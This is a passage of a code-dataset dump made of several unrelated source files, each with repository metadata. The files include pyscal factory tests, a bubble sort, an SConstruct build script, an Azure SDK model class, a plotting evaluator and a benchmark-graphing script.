Note that we are case insensitive in the\n # factory class\n line_syntax = [\n \"CMD\",\n \"Lw\",\n \"Ew\",\n \"Tw\",\n \"Lo\",\n \"Eo\",\n \"To\",\n \"Sorw\",\n \"Swl\",\n \"krwend\",\n \"steps\",\n \"perm\",\n \"poro\",\n \"a\",\n \"b\",\n \"sigma_costau\",\n ]\n\n if len(conf_line.split()) > len(line_syntax):\n raise ValueError(\"Too many items on gensatfunc confline\")\n\n params = {}\n for idx, value in enumerate(conf_line.split()):\n if idx > 0: # Avoid the CMD\n params[line_syntax[idx]] = float(value)\n\n # The 'steps' is not supported in pyscal, convert it:\n if \"steps\" in params:\n params[\"h\"] = 1.0 / params[\"steps\"]\n\n if \"krwend\" not in params: # Last mandatory item\n raise ValueError(\"Too few items on gensatfunc confline\")\n\n return params\n\n\ndef test_gensatfunc():\n \"\"\"Test how the external tool gen_satfunc could use\n the factory functionality\"\"\"\n\n pyscal_factory = PyscalFactory()\n\n # Example config line for gen_satfunc:\n conf_line_pc = \"RELPERM 4 2 1 3 2 1 0.15 0.10 0.5 20 100 0.2 0.22 -0.5 30\"\n\n wateroil = pyscal_factory.create_water_oil(parse_gensatfuncline(conf_line_pc))\n swof = wateroil.SWOF()\n assert \"0.17580\" in swof # krw at sw=0.65\n assert \"0.0127\" in swof # krow at sw=0.65\n assert \"Capillary pressure from normalized J-function\" in swof\n assert \"2.0669\" in swof # pc at swl\n\n conf_line_min = \"RELPERM 1 2 3 1 2 3 0.1 0.15 0.5 20\"\n wateroil = pyscal_factory.create_water_oil(parse_gensatfuncline(conf_line_min))\n swof = wateroil.SWOF()\n assert \"Zero capillary pressure\" in swof\n\n conf_line_few = \"RELPERM 1 2 3 1 2 3\"\n with pytest.raises(ValueError):\n parse_gensatfuncline(conf_line_few)\n\n # sigma_costau is missing here:\n conf_line_almost_pc = \"RELPERM 4 2 1 3 2 1 0.15 0.10 0.5 20 100 0.2 0.22 -0.5\"\n wateroil = pyscal_factory.create_water_oil(\n parse_gensatfuncline(conf_line_almost_pc)\n )\n swof = wateroil.SWOF()\n # The factory will not recognize the normalized J-function\n # when costau is missing. Any error message would be the responsibility\n # of the parser\n assert \"Zero capillary pressure\" in swof\n\n\ndef test_sufficient_params():\n \"\"\"Test the utility functions to determine whether\n WaterOil and GasOil object have sufficient parameters\"\"\"\n\n assert factory.sufficient_gas_oil_params({\"ng\": 0, \"nog\": 0})\n # If it looks like the user meant to create GasOil, but only provided\n # data for krg, then might error hard. 
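The failhard flag controls this. 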
If the user did not provide\n # any data for GasOil, then the code returns False\n with pytest.raises(ValueError):\n factory.sufficient_gas_oil_params({\"ng\": 0}, failhard=True)\n assert not factory.sufficient_gas_oil_params({\"ng\": 0}, failhard=False)\n assert not factory.sufficient_gas_oil_params({})\n with pytest.raises(ValueError):\n factory.sufficient_gas_oil_params({\"lg\": 0}, failhard=True)\n assert not factory.sufficient_gas_oil_params({\"lg\": 0}, failhard=False)\n assert factory.sufficient_gas_oil_params(\n {\"lg\": 0, \"eg\": 0, \"Tg\": 0, \"log\": 0, \"eog\": 0, \"tog\": 0}\n )\n\n assert factory.sufficient_water_oil_params({\"nw\": 0, \"now\": 0})\n with pytest.raises(ValueError):\n factory.sufficient_water_oil_params({\"nw\": 0}, failhard=True)\n assert not factory.sufficient_water_oil_params({})\n with pytest.raises(ValueError):\n factory.sufficient_water_oil_params({\"lw\": 0}, failhard=True)\n assert factory.sufficient_water_oil_params(\n {\"lw\": 0, \"ew\": 0, \"Tw\": 0, \"low\": 0, \"eow\": 0, \"tow\": 0}\n )\n\n\ndef test_sufficient_params_gaswater():\n \"\"\"Test that we can detect sufficient parameters\n for gas-water only\"\"\"\n assert factory.sufficient_gas_water_params({\"nw\": 0, \"ng\": 0})\n assert not factory.sufficient_gas_water_params({\"nw\": 0, \"nog\": 0})\n assert factory.sufficient_gas_water_params(dict(lw=0, ew=0, tw=0, lg=0, eg=0, tg=0))\n assert not factory.sufficient_gas_water_params(dict(lw=0))\n assert not factory.sufficient_gas_water_params(dict(lw=0, lg=0))\n assert not factory.sufficient_gas_water_params(dict(lw=0, lg=0))\n\n with pytest.raises(ValueError):\n factory.sufficient_gas_water_params(dict(lw=0), failhard=True)\n with pytest.raises(ValueError):\n factory.sufficient_gas_water_params({\"nw\": 3}, failhard=True)\n\n assert factory.sufficient_gas_water_params(dict(lw=0, ew=0, tw=0, ng=0))\n assert factory.sufficient_gas_water_params(dict(lg=0, eg=0, tg=0, nw=0))\n assert not factory.sufficient_gas_water_params(dict(lg=0, eg=0, tg=0, ng=0))\n\n\ndef test_case_aliasing():\n \"\"\"Test that we can use aliases for the CASE column\n in SCAL recommendations\"\"\"\n dframe = pd.DataFrame(\n columns=[\"SATNUM\", \"CASE\", \"Nw\", \"Now\", \"Ng\", \"Nog\"],\n data=[\n [1, \"pess\", 2, 2, 1, 1],\n [1, \"base\", 3, 1, 1, 1],\n [1, \"opt\", 3, 1, 1, 1],\n ],\n )\n relperm_data = PyscalFactory.load_relperm_df(dframe)\n PyscalFactory.create_scal_recommendation_list(relperm_data, h=0.2).interpolate(-0.4)\n dframe = pd.DataFrame(\n columns=[\"SATNUM\", \"CASE\", \"Nw\", \"Now\", \"Ng\", \"Nog\"],\n data=[\n [1, \"pessimistic\", 2, 2, 1, 1],\n [1, \"base\", 3, 1, 1, 1],\n [1, \"optiMISTIc\", 3, 1, 1, 1],\n ],\n )\n relperm_data = PyscalFactory.load_relperm_df(dframe)\n PyscalFactory.create_scal_recommendation_list(relperm_data, h=0.2).interpolate(-0.4)\n\n with pytest.raises(ValueError):\n PyscalFactory.load_relperm_df(\n pd.DataFrame(\n columns=[\"SATNUM\", \"CASE\", \"Nw\", \"Now\", \"Ng\", \"Nog\"],\n data=[\n [1, \"FOOBAR\", 2, 2, 1, 1],\n [1, \"base\", 3, 1, 1, 1],\n [1, \"optIMIstiC\", 3, 1, 1, 1],\n ],\n )\n )\n\n # Ambiguous data:\n with pytest.raises(ValueError):\n amb = PyscalFactory.load_relperm_df(\n pd.DataFrame(\n columns=[\"SATNUM\", \"CASE\", \"Nw\", \"Now\", \"Ng\", \"Nog\"],\n data=[\n [1, \"low\", 2, 2, 1, 1],\n [1, \"pess\", 5, 5, 5, 5],\n [1, \"base\", 3, 1, 1, 1],\n [1, \"optIMIstiC\", 3, 1, 1, 1],\n ],\n )\n )\n PyscalFactory.create_scal_recommendation_list(amb)\n\n # Missing a case\n with pytest.raises(ValueError):\n 
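# only two of the three SCAL cases are supplied below\n 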
PyscalFactory.load_relperm_df(\n pd.DataFrame(\n columns=[\"SATNUM\", \"CASE\", \"Nw\", \"Now\", \"Ng\", \"Nog\"],\n data=[[1, \"base\", 3, 1, 1, 1], [1, \"optIMIstiC\", 3, 1, 1, 1]],\n )\n )\n # Missing a case\n with pytest.raises(ValueError):\n PyscalFactory.load_relperm_df(\n pd.DataFrame(\n columns=[\"SATNUM\", \"CASE\", \"Nw\", \"Now\", \"Ng\", \"Nog\"],\n data=[[1, \"base\", 3, 1, 1, 1]],\n )\n )\n\n\ndef test_socr_via_dframe():\n \"\"\"Test that the \"socr\" parameter is picked up from a dataframe/xlsx input\"\"\"\n p_list = PyscalFactory.create_pyscal_list(\n PyscalFactory.load_relperm_df(\n pd.DataFrame(\n columns=[\"SATNUM\", \"Nw\", \"Now\", \"socr\"],\n data=[[1, 2, 2, 0.5]],\n )\n )\n )\n assert \"socr=0.5\" in p_list.SWOF()\n\n\ndef test_swirr_partially_missing(tmp_path):\n \"\"\"Test that swirr can be present for only a subset of the rows,\n and interpreted as zero when not there.\"\"\"\n dframe = pd.DataFrame(\n columns=[\n \"SATNUM\",\n \"Nw\",\n \"Now\",\n \"swl\",\n \"swirr\",\n \"a\",\n \"b\",\n \"poro_ref\",\n \"perm_ref\",\n \"drho\",\n ],\n data=[\n [1, 2, 2, 0.2, 0.1, 2, -2, 0.2, 100, 300],\n [2, 3, 3, 0.1, np.nan, np.nan, np.nan, np.nan, np.nan],\n ],\n )\n relperm_data = PyscalFactory.load_relperm_df(dframe)\n p_list = PyscalFactory.create_pyscal_list(relperm_data, h=0.2)\n assert \"a=2, b=-2\" in p_list[1].pccomment\n assert p_list[2].pccomment == \"\"\n\n os.chdir(tmp_path)\n dframe.to_excel(\"partial_pc.xlsx\")\n relperm_data_via_xlsx = PyscalFactory.load_relperm_df(\"partial_pc.xlsx\")\n p_list = PyscalFactory.create_pyscal_list(relperm_data_via_xlsx, h=0.2)\n assert \"a=2, b=-2\" in p_list[1].pccomment\n assert p_list[2].pccomment == \"\"\n\n\ndef test_corey_let_mix():\n \"\"\"Test that we can supply a dataframe where some SATNUMs\n have Corey and others have LET\"\"\"\n dframe = pd.DataFrame(\n columns=[\"SATNUM\", \"Nw\", \"Now\", \"Lw\", \"Ew\", \"Tw\", \"Ng\", \"Nog\"],\n data=[[1, 2, 2, np.nan, np.nan, np.nan, 1, 1], [2, np.nan, 3, 1, 1, 1, 2, 2]],\n )\n relperm_data = PyscalFactory.load_relperm_df(dframe)\n p_list = PyscalFactory.create_pyscal_list(relperm_data, h=0.2)\n swof1 = p_list.pyscal_list[0].SWOF()\n swof2 = p_list.pyscal_list[1].SWOF()\n assert \"Corey krw\" in swof1\n assert \"Corey krow\" in swof1\n assert \"LET krw\" in swof2\n assert \"Corey krow\" in swof2\n\n\ndef test_infer_tabular_file_format(tmp_path, caplog):\n \"\"\"Test code that infers the fileformat of files with tabular data\"\"\"\n testdir = Path(__file__).absolute().parent\n assert (\n factory.infer_tabular_file_format(testdir / \"data/scal-pc-input-example.xlsx\")\n == \"xlsx\"\n )\n assert (\n factory.infer_tabular_file_format(\n str(testdir / \"data/scal-pc-input-example.xlsx\")\n )\n == \"xlsx\"\n )\n assert (\n factory.infer_tabular_file_format(testdir / \"data/scal-pc-input-example.xls\")\n == \"xls\"\n )\n os.chdir(tmp_path)\n pd.DataFrame([{\"SATNUM\": 1, \"NW\": 2}]).to_csv(\"some.csv\", index=False)\n assert factory.infer_tabular_file_format(\"some.csv\") == \"csv\"\n\n Path(\"empty.csv\").write_text(\"\", encoding=\"utf8\")\n assert factory.infer_tabular_file_format(\"empty.csv\") == \"\"\n # Ensure Pandas's error message got through:\n assert \"No columns to parse from file\" in caplog.text\n\n # We don't want ISO-8859 files, ensure we fail\n norw_chars = \"Dette,er,en,CSV,fil\\nmed,iso-8859:,æ,ø,å\"\n Path(\"iso8859.csv\").write_bytes(norw_chars.encode(\"iso-8859-1\"))\n assert factory.infer_tabular_file_format(\"iso8859.csv\") == \"\"\n # Providing an error that 
the failure was due to ISO-8859\n # rather than anything else is deemed too hard.\n Path(\"utf8.csv\").write_bytes(norw_chars.encode(\"utf-8\"))\n assert factory.infer_tabular_file_format(\"utf8.csv\") == \"csv\"\n\n # Write some random bytes to a file; it is very unlikely\n # that this yields a valid xlsx/xls/csv file.\n Path(\"wrong.csv\").write_bytes(os.urandom(100))\n assert factory.infer_tabular_file_format(\"wrong.csv\") == \"\"\n\n\n@pytest.mark.parametrize(\n \"orig_dict, keylist, expected_dict\",\n [\n ({}, [], {}),\n ({\"foo\": 1}, [], {}),\n ({\"foo\": 1}, [\"fo\"], {}),\n ({\"foo\": 1}, [\"foo\"], {\"foo\": 1}),\n ({}, [\"foo\"], {}),\n ],\n)\ndef test_slicedict(orig_dict, keylist, expected_dict):\n \"\"\"Test that dictionaries can be sliced for subsets\"\"\"\n assert factory.slicedict(orig_dict, keylist) == expected_dict\n","repo_name":"equinor/pyscal","sub_path":"tests/test_factory.py","file_name":"test_factory.py","file_ext":"py","file_size_in_byte":46308,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"52"} +{"seq_id":"27426302566","text":"import re\ndup = re.compile('([a-z0-9-_.]+)') # regex for lowercase letters, digits and the allowed special characters\n\n\nid = input().lower() # to lowercase\nm = dup.findall(id) # find every substring matching the regex, returned as a list\nid = \"\".join(m) # join them\n#print(m)\n\nconti = re.compile('([.]{2,})') # regex for two or more consecutive dots\nm = conti.findall(id)\nfor i in m: # loop over the matches\n id = id.replace(i,\".\",1) # string replace; the trailing 1 is the replace count (without it, every occurrence is replaced)\n#print(id)\n\nfirst_dot_check = re.compile('(^[.]+)|([.]+$)') # check for dots at the very start or end\nid = first_dot_check.sub(\"\",id) # strip them\n\n#print(id)\nif(id == \"\"):\n id = \"a\"\n\nif(len(id)>=16): # when the length is 16 or more\n id = id[:15]\n id = first_dot_check.sub(\"\",id)\nif(len(id)<=2):\n last = id[-1]\n while(len(id)!=3):\n id += last\n\nprint(id)","repo_name":"dlckdduq1107/coding_test","sub_path":"Solutions/하루 한문제 코테준비/new_id_recommend_programmers_72410.py","file_name":"new_id_recommend_programmers_72410.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"17927882886","text":"\r\ndef bubbleSort(lst):\r\n '''\r\n Runs in O(n^2) time.\r\n '''\r\n n = len(lst)\r\n for i in range(1,n):\r\n for j in range(0, n-1):\r\n key = lst[j + 1]\r\n if lst[j] > lst[j + 1]:\r\n lst[j + 1] = lst[j]\r\n lst[j] = key\r\n return lst\r\n \r\nprint(bubbleSort([5,2,1,4,6,3]))\r\n","repo_name":"SiddhantBhardwaj2018/Data-Structures-and-Algorithms-in-Python","sub_path":"Bubble Sort.py","file_name":"Bubble Sort.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38575618193","text":"from SCons.Script import *\nfrom os import access, environ, X_OK\nimport platform\n\n#CacheDir('.scons-cache')\nDecider('MD5-timestamp')\nSetOption('implicit_cache', True)\nSourceCode('.', None)\n\n\n########################################################################\n#\n# various command-line options\n#\n\ndef pathIsExecutable(key, val, env):\n found = env.WhereIs(val)\n if found: val = found\n PathVariable.PathIsFile(key, val, env)\n if not access(val, X_OK):\n raise SCons.Errors.UserError('Path for option %s is not executable: %s' % (key, val))\n\nopts = Variables(['.scons-options'], ARGUMENTS)\nopts.Add(BoolVariable('DEBUG', 'Compile with extra information for debugging', False))\nopts.Add(BoolVariable('OPTIMIZE', 'Compile with optimization', False))\nopts.Add(BoolVariable('NATIVECAML', 'Use 
the native-code OCaml compiler', True))\nopts.Add(BoolVariable('PROFILE', 'Turn on performance profiling', False))\nopts.Add(BoolVariable('VALGRIND', \"Run tests under Valgrind's memory checker\", False))\nopts.Add(PathVariable('LLVM_CONFIG', 'Path to llvm-config executable', WhereIs('llvm-config'), pathIsExecutable))\n\n\n\n\nif platform.system() == 'Darwin':\n Is64 = False\nelse:\n Is64 = platform.architecture()[0] == '64bit'\n\nenv = Environment(\n\t\tCCFLAGS = ['-Isrc/lib'],\n options=opts,\n Is64=Is64,\n )\n\nenv.PrependENVPath('PATH', [\n '/home/rubio/build-llvm/Release/bin',\n '/usr/local/bin',\n '/opt/local/bin',\n '/unsup/ocaml/bin',\n '/s/texlive-2008/bin',\n '/s/std/bin',\n ])\n\n\n########################################################################\n#\n# basic LaTeX document rendering\n#\n\nenv.AppendUnique(\n COMMONLATEXFLAGS=['-file-line-error', '-interaction=batchmode'],\n LATEXFLAGS='$COMMONLATEXFLAGS',\n PDFLATEXFLAGS='$COMMONLATEXFLAGS',\n BIBTEXFLAGS='-terse',\n )\n\n\n########################################################################\n#\n# shared compilation flags\n#\n\nflags = [\n '-Wall',\n '-Wformat=2',\n '-Wextra',\n '-Werror',\n '${(\"\", \"-g\")[DEBUG]}',\n '${(\"\", \"-O\")[OPTIMIZE]}',\n ]\n\nenv.AppendUnique(\n CCFLAGS=flags,\n LINKFLAGS=flags,\n )\n\n\n########################################################################\n#\n# subsidiary scons scripts\n#\n\nSConscript(\n dirs=[\n # our stuff\n\t'src',\n ],\n exports='env',\n )\n","repo_name":"corvette-berkeley/precimonious","sub_path":"SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"52"} +{"seq_id":"16289885395","text":"from msrest.serialization import Model\n\n\nclass DataLakeStoreAccountUpdateParameters(Model):\n \"\"\"Data Lake Store account information to update.\n\n :param tags: Resource tags\n :type tags: dict\n :param firewall_state: The current state of the IP address firewall for\n this Data Lake store account. Disabling the firewall does not remove\n existing rules, they will just be ignored until the firewall is\n re-enabled. Possible values include: 'Enabled', 'Disabled'\n :type firewall_state: str or :class:`FirewallState\n <azure.mgmt.datalake.store.models.FirewallState>`\n :param trusted_id_provider_state: The current state of the trusted\n identity provider feature for this Data Lake store account. Disabling\n trusted identity provider functionality does not remove the providers,\n they will just be ignored until this feature is re-enabled. Possible\n values include: 'Enabled', 'Disabled'\n :type trusted_id_provider_state: str or :class:`TrustedIdProviderState\n <azure.mgmt.datalake.store.models.TrustedIdProviderState>`\n :param default_group: the default owner group for all new folders and\n files created in the Data Lake Store account.\n :type default_group: str\n :param new_tier: the commitment tier to use for next month. Possible\n values include: 'Consumption', 'Commitment_1TB', 'Commitment_10TB',\n 'Commitment_100TB', 'Commitment_500TB', 'Commitment_1PB', 'Commitment_5PB'\n :type new_tier: str or :class:`TierType\n <azure.mgmt.datalake.store.models.TierType>`\n :param firewall_allow_azure_ips: The current state of allowing or\n disallowing IPs originating within Azure through the firewall. If the\n firewall is disabled, this is not enforced. Possible values include:\n 'Enabled', 'Disabled'\n :type firewall_allow_azure_ips: str or :class:`FirewallAllowAzureIpsState\n <azure.mgmt.datalake.store.models.FirewallAllowAzureIpsState>`\n :param encryption_config: Used for rotation of user managed Key Vault\n keys. 
Can only be used to rotate a user managed encryption Key Vault key.\n :type encryption_config: :class:`UpdateEncryptionConfig\n <azure.mgmt.datalake.store.models.UpdateEncryptionConfig>`\n \"\"\"\n\n _attribute_map = {\n 'tags': {'key': 'tags', 'type': '{str}'},\n 'firewall_state': {'key': 'properties.firewallState', 'type': 'FirewallState'},\n 'trusted_id_provider_state': {'key': 'properties.trustedIdProviderState', 'type': 'TrustedIdProviderState'},\n 'default_group': {'key': 'properties.defaultGroup', 'type': 'str'},\n 'new_tier': {'key': 'properties.newTier', 'type': 'TierType'},\n 'firewall_allow_azure_ips': {'key': 'properties.firewallAllowAzureIps', 'type': 'FirewallAllowAzureIpsState'},\n 'encryption_config': {'key': 'properties.encryptionConfig', 'type': 'UpdateEncryptionConfig'},\n }\n\n def __init__(self, tags=None, firewall_state=None, trusted_id_provider_state=None, default_group=None, new_tier=None, firewall_allow_azure_ips=None, encryption_config=None):\n self.tags = tags\n self.firewall_state = firewall_state\n self.trusted_id_provider_state = trusted_id_provider_state\n self.default_group = default_group\n self.new_tier = new_tier\n self.firewall_allow_azure_ips = firewall_allow_azure_ips\n self.encryption_config = encryption_config\n","repo_name":"EnjoyLifeFund/macHighSierra-cellars","sub_path":"azure-cli/2.0.18/libexec/lib/python3.6/site-packages/azure/mgmt/datalake/store/models/data_lake_store_account_update_parameters.py","file_name":"data_lake_store_account_update_parameters.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"13300859710","text":"# -*- coding: utf-8 -*-\n\n\nclass RestMessage(object):\n def __init__(self, status, items=None, links=None, *args, **kwargs):\n super(RestMessage, self).__init__(*args, **kwargs)\n\n self.status = status\n self.items = items\n self.links = links\n","repo_name":"linkdd/link.rest","sub_path":"link/rest/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3970387487","text":"# Ask the user for an integer\nsize = int(input(\"Enter an integer: \"))\n\n# Print a square sized according to the user input\nfor i in range(size):\n for j in range(size):\n # Print '#' followed by a space\n print('#', end=' ')\n # Print a newline once a full row has been printed\n print()","repo_name":"abdullahalwafi/ddp","sub_path":"praktikum2/cetakpersegi.py","file_name":"cetakpersegi.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32608969372","text":"import pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt, rcParams, rcParamsDefault\nfrom itertools import cycle\n\nimport mofr.metrics as metrics\nfrom mofr.evaluator import Evaluator\nfrom mofr.basic_evaluators.settings import figsize_, colors_\n\n\nclass HistogramContinuousEvaluator(Evaluator):\n\n def __init__(self, data=None, predictor_column=None):\n \"\"\"\n data: The pandas dataframe containing all the necessary columns.\n\n predictor_column: The name of the column containing the continuous predictor.\n Any number of distinct values is fine, since the histogram bins are computed automatically. 
The values should be numeric, or \n at least convertible to float.\n \"\"\"\n self.data=data\n self.predictor_column=predictor_column\n \n def d(self, data=None):\n self.data=data\n return self \n\n def pc(self, predictor_column=None):\n self.predictor_column=predictor_column\n return self \n\n\n def get_graph(self, plot=True):\n\n # setup plot details\n rcParams.update(rcParamsDefault)\n f, ax = plt.subplots(figsize=figsize_)\n \n #set up data details\n df_=self.data\n df_[self.predictor_column]=df_[self.predictor_column].apply(float)\n\n # produce histogram\n n, bins, patches = plt.hist(df_[self.predictor_column], bins='doane', density=False, facecolor='b', alpha=0.75, edgecolor='black', axes=ax)\n\n plt.xlabel('Values', axes=ax)\n plt.ylabel('Number of observations', axes=ax)\n plt.title(f'Histogram of predictor \"{self.predictor_column}\"', axes=ax)\n ax.grid(True)\n\n if plot==True:\n plt.show() \n\n self.graph=f\n self.axis=ax\n\n plt.close() \n\n return self\n \n\n def get_table(self):\n #percentile functions for the pivot table\n def percentile_10(x):\n return np.percentile(x,10)\n def percentile_25(x):\n return np.percentile(x,25)\n def percentile_50(x):\n return np.percentile(x,50)\n def percentile_75(x):\n return np.percentile(x,75)\n def percentile_90(x):\n return np.percentile(x,90)\n \n #set up data details\n df_=self.data\n df_[self.predictor_column]=df_[self.predictor_column].apply(float)\n df_['']=self.predictor_column\n categories=['percentile_10', 'percentile_25', 'percentile_50', 'percentile_75', 'percentile_90']\n n_categories=len(categories)\n\n # produce table of distribution/share in time\n pt=pd.pivot_table(df_, values=self.predictor_column, index='', columns=None, aggfunc=[percentile_10,percentile_25,percentile_50, percentile_75, percentile_90], fill_value=None, margins=False, dropna=True, margins_name='All')\n pt.columns=[pt.columns[x][0] for x in range(len(pt.columns))]\n pt=pt.transpose()\n\n #produce table of distribution/share of each category in time\n final_table=pt.style.set_table_attributes(\"style='display:inline'\").set_caption(f'Percentiles of predictor \"{self.predictor_column}\"') \n self.table=final_table\n \n return self","repo_name":"Vrboska/mofr","sub_path":"mofr/basic_evaluators/HistogramContinuous.py","file_name":"HistogramContinuous.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"8699996507","text":"import pandas as pd\n\ndata = \"https://bites-data.s3.us-east-2.amazonaws.com/summer.csv\"\n\n\ndef athletes_most_medals(data: str = data) -> dict:\n df = pd.read_csv(data)\n men = df[df[\"Gender\"] == \"Men\"]\n women = df[df[\"Gender\"] == \"Women\"]\n\n medal_dict = {}\n woman_name, woman_count = women[\"Athlete\"].value_counts().index[0], women[\"Athlete\"].value_counts()[0]\n man_name, man_count = men[\"Athlete\"].value_counts().index[0], men[\"Athlete\"].value_counts()[0]\n medal_dict[woman_name] = woman_count\n medal_dict[man_name] = man_count\n return medal_dict\n\n\nif __name__ == \"__main__\":\n print(athletes_most_medals())","repo_name":"syurskyi/Python_Topics","sub_path":"125_algorithms/_examples/_algorithms_challenges/pybites/intermediate/140/medals.py","file_name":"medals.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"20368035604","text":"#!/usr/bin/env python3\nimport os\nfrom collections import 
defaultdict, namedtuple\nimport argparse\nimport re\nimport plotly\n\n\nBenchmarkResults = namedtuple('BenchmarkResults', ['data', 'sizes_in_bytes', 'cardinalities'])\n\n\ndef main():\n argparser = argparse.ArgumentParser(description='Graphs the results of running the benchmarks')\n argparser.add_argument('--file', type=str, help='Path to the file that contains the benchmark output')\n argparser.add_argument('--min_elements', type=int, default=0, help='The minimum container size to graph; 0 for no minimum')\n argparser.add_argument('--max_elements', type=int, default=0, help='The maximum container size to graph; 0 for no maximum')\n args = argparser.parse_args()\n\n with open(args.file) as out_file:\n results = parse_benchmark_results(out_file.readlines(), args.min_elements, args.max_elements)\n graph_results(results, 'out')\n\n\ndef parse_benchmark_results(benchmark_output, min_elements=None, max_elements=None):\n \"\"\"\n :type benchmark_output list[str]\n :type min_elements int|None\n :type max_elements int|None\n :rtype BenchmarkResults\n :return The parsed benchmark results file. The data member dict looks like this:\n {\n benchmark_function_str: {\n data_size_int: {\n container_type_str: {\n num_elements_int: cpu_time_nanoseconds\n }\n }\n }\n }\n While the sizes_in_bytes and cardinalities members are sorted lists.\n \"\"\"\n def data_type_to_size(data_type):\n if data_type == \"int\":\n return 4\n elif data_type == \"size_16\":\n return 16\n elif data_type == \"size_64\":\n return 64\n raise Exception(\"Unknown type \" + data_type)\n\n # Regex for individual iterations of the benchmark\n # Group 1: benchmark function name, e.g., BM_vector_sequential_read\n # Group 2: container type, e.g., FixedArray\n # Group 3: data type, e.g., int or size_16\n # Group 4: number of elements, between 4 and 16384\n # Group 5: clock time in ns\n # Group 6: CPU time in ns\n # Group 7: iteration count\n benchmark_re = re.compile(r\"^(\\w+)<([\\w<>:, ]+), (\\w+)>\\/(\\d+)\\s+(\\d+) ns\\s+(\\d+) ns\\s+(\\d+)$\")\n\n data = defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(int))))\n data_sizes = set()\n cardinalities = set()\n\n for line in benchmark_output:\n match = benchmark_re.match(line)\n if match:\n benchmark_fn = match.group(1)\n container_type = match.group(2)\n if container_type.startswith('std_'):\n container_type = container_type.replace('std_', 'std::')\n\n data_size = data_type_to_size(match.group(3))\n num_elements = int(match.group(4))\n cpu_time = int(match.group(6))\n meets_min_requirements = not min_elements or num_elements >= min_elements\n meets_max_requirements = not max_elements or num_elements <= max_elements\n if meets_min_requirements and meets_max_requirements:\n data[benchmark_fn][data_size][container_type][num_elements] = cpu_time\n data_sizes.add(data_size)\n cardinalities.add(num_elements)\n return BenchmarkResults(data=data, sizes_in_bytes=sorted(data_sizes), cardinalities=sorted(cardinalities))\n\n\ndef graph_results(benchmark_results, out_dir):\n \"\"\"\n :type benchmark_results: BenchmarkResults\n :type out_dir str\n \"\"\"\n def name_file(benchmark_function_name, data_size, max_container_size):\n type = None\n for potential_type in ['vector', 'set', 'map']:\n if (\"_%s_\" % potential_type) in benchmark_function_name:\n type = potential_type\n break\n\n op_decoder = {\n 'rand_read': 'Random reads',\n 'sequential_read': 'Sequential reads',\n 'insert': 'Insertion',\n 'lookup': 'Random lookup',\n 'set_read': 'Random lookup',\n }\n for 
function_partial_name, decoded in op_decoder.items():\n if function_partial_name in benchmark_function_name:\n return \"%s in %ss up to %d elements (%d byte data).png\" % (decoded, type, max_container_size, data_size)\n return \"%s_data_size_%d.png\" % (benchmark_fn, data_size)\n\n try:\n os.makedirs(out_dir)\n except os.error:\n pass\n\n for benchmark_fn, data_sizes_for_fn in benchmark_results.data.items():\n for data_size, container_types_at_size in data_sizes_for_fn.items():\n # Make a graph of the time required by each container type with this data size and any number of elements\n max_cardinality = 0\n traces = []\n for container_type, num_elements_for_container in container_types_at_size.items():\n times = [] # CPU time in nanoseconds\n for cardinality in benchmark_results.cardinalities:\n times.append(num_elements_for_container[cardinality])\n max_cardinality = max(max_cardinality, cardinality)\n traces.append(plotly.graph_objs.Scatter(\n x=benchmark_results.cardinalities,\n y=times,\n mode='lines+markers',\n name=container_type\n ))\n layout = plotly.graph_objs.Layout(\n title=\"%s() Time (at %d Byte Data Size) by Number of Elements\" % (benchmark_fn, data_size),\n xaxis=dict(title='Number of Elements in the Container'),\n yaxis=dict(title='Time (nanoseconds)')\n )\n figure = plotly.graph_objs.Figure(data=traces, layout=layout)\n # plotly.offline.plot(figure,\n # filename=\"%s_data_size_%d.html\" % (benchmark_fn, data_size),\n # auto_open=False)\n plotly.io.write_image(figure, os.path.join(out_dir,\n name_file(benchmark_fn, data_size, max_cardinality)))\n\n # We need separate graphs by container size.\n # E.g., if you know your container will have 8 elements, here's the fastest container for iteration.\n # If you know it'll have 1,000, look at the other graph.\n # Graphs plot the time required by data size for each container\n\n\ndef debug_dump_data(data):\n for benchmark_fn, data_by_container_type in data.items():\n print(benchmark_fn + \":\")\n for container_type, data_by_size in data_by_container_type.items():\n print(\"\\t\", container_type)\n for size, data_by_num_elements in data_by_size.items():\n print(\"\\t\\tData size\", size)\n for elements, cpu_time_ns in data_by_num_elements.items():\n print(\"\\t\\t\\t\", elements, \":\", cpu_time_ns)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"s3cur3/llvm-data-structure-benchmarks","sub_path":"scripts/graph_results.py","file_name":"graph_results.py","file_ext":"py","file_size_in_byte":6949,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"52"} +{"seq_id":"5227077570","text":"import os\nfrom pathlib import Path\nimport json\n\nfrom devtools import debug\n\n# from fractal_tasks_core.create_ome_zarr import create_ome_zarr\n# from fractal_tasks_core.yokogawa_to_ome_zarr import yokogawa_to_ome_zarr\nfrom scmultiplex_feature_measurements import scmultiplex_measurements\n\n# zarr_path = \"/Users/joel/shares/workShareJoel/v1_fractal/fractal-demos/examples/02_cardio_small/tmp_cardio-2x2-testing/output/\"\n# metadata_path = 